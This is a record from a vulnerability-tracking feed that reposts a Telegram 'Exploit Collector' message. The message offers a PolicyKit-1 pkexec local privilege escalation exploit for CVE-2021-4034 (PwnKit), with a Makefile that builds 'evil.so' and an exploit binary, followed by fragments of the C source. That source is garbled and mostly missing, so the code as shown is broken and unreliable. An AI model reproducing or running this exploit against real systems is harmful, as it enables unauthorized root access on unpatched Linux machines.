{"uuid": "6d3bde26-ebaf-4ad7-8489-d47358c87bd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/hacking_Attack/40447", "content": "Exploit Collector\nPolicyKit-1 0.105-31 Privilege Escalation\n\nhttps://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png \nPolicyKit-1 version 0.105-31 pkexec local privilege escalation exploit.\n\nMD5 | 306be3c9311743edfa3eecbd845b8ac0\n\nDownload\n# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation\n# Exploit Author: Lance Biggerstaff\n# Original Author: ryaagard (https://github.com/ryaagard)\n# Date: 27-01-2022\n# Github Repo: https://github.com/ryaagard/CVE-2021-4034\n# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt\n\n# Description: The exploit consists of three files `Makefile`, `evil-so.c` &amp; `exploit.c`\n\n##### Makefile #####\n\nall:\ngcc -shared -o evil.so -fPIC evil-so.c\ngcc exploit.c -o exploit\n\nclean:\nrm -r ./GCONV_PATH=. &amp;&amp; rm -r ./evildir &amp;&amp; rm exploit &amp;&amp; rm evil.so\n\n#################\n\n##### evil-so.c #####\n\n#include  \" DIR \"/gconv-modules\");\nsystem(\"cp \" EVILSO \".so \" DIR);\n\nexecve(BIN, argv, envp);\n\nreturn 0;\n}\n\n#################\n\nSource:packetstormsecurity.com", "creation_timestamp": "2026-09-01T20:01:58.205520Z"}